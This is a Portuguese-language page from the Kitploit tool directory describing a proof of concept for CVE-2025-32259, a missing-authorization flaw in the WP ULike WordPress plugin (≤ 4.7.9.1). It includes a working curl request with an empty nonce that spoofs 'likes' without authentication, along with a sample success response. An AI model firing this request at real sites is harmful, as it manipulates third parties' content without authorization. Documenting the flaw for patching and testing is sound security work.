Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
wp-ulike-cve-2025-32259-poc — Nas versões afetadas do plugin WP ULike, não há uma verificação de autorização adequada antes de permitir certas ações AJAX ou manipulações de votos. Isso permite que usuários não autenticados interajam com o plugin de maneiras que apenas usuários logados deveriam conseguir — potencialmente distorcendo votos ou injetando dados enganosos. | Kitploit
Ferramentas/GitHubGitHub/hossameahmed/wp-ulike-cve-2025-32259-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubhossameahmed/wp-ulike-cve-2025-32259-poc

wp-ulike-cve-2025-32259-poc

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →

Sobre

Nas versões afetadas do plugin WP ULike, não há uma verificação de autorização adequada antes de permitir certas ações AJAX ou manipulações de votos. Isso permite que usuários não autenticados interajam com o plugin de maneiras que apenas usuários logados deveriam conseguir — potencialmente distorcendo votos ou injetando dados enganosos.

Compartilhar

WP ULike ≤ 4.7.9.1 - Spoofing de Conteúdo Não Autenticado (CVE-2025-32259)

🔬 Um PoC simples demonstrando CVE-2025-32259 no plugin WP ULike para WordPress.
🚨 Uso educacional apenas – não teste em sistemas sem autorização explícita.


🧠 Visão Geral

WP ULike é um plugin popular do WordPress que permite aos usuários curtir conteúdo em um site. As versões até 4.7.9.1 sofrem de uma vulnerabilidade de autorização ausente, permitindo que usuários não autenticados falsifiquem ações de "curtir" por meio de requisições AJAX.

  • CVE: CVE-2025-32259
  • Versões Vulneráveis: ≤ 4.7.9.1
  • Versão Corrigida: 4.7.9.2

🚀 Prova de Conceito

A vulnerabilidade permite que usuários não autenticados interajam com o endpoint AJAX e curtam qualquer conteúdo (post, comentário, etc.) sem permissão.

🔧 Script PoC

curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
  -d "action=wp_ulike_process" \
  -d "method=likeThis" \
  -d "id=1" \
  -d "type=post" \
  -d "nonce=" \
  -H "Content-Type: application/x-www-form-urlencoded"

Substitua id=1 por um ID de post válido.

Uma resposta bem-sucedida pode ser algo como:

{"status":"success","msg":"You liked this."}
Baixar ferramenta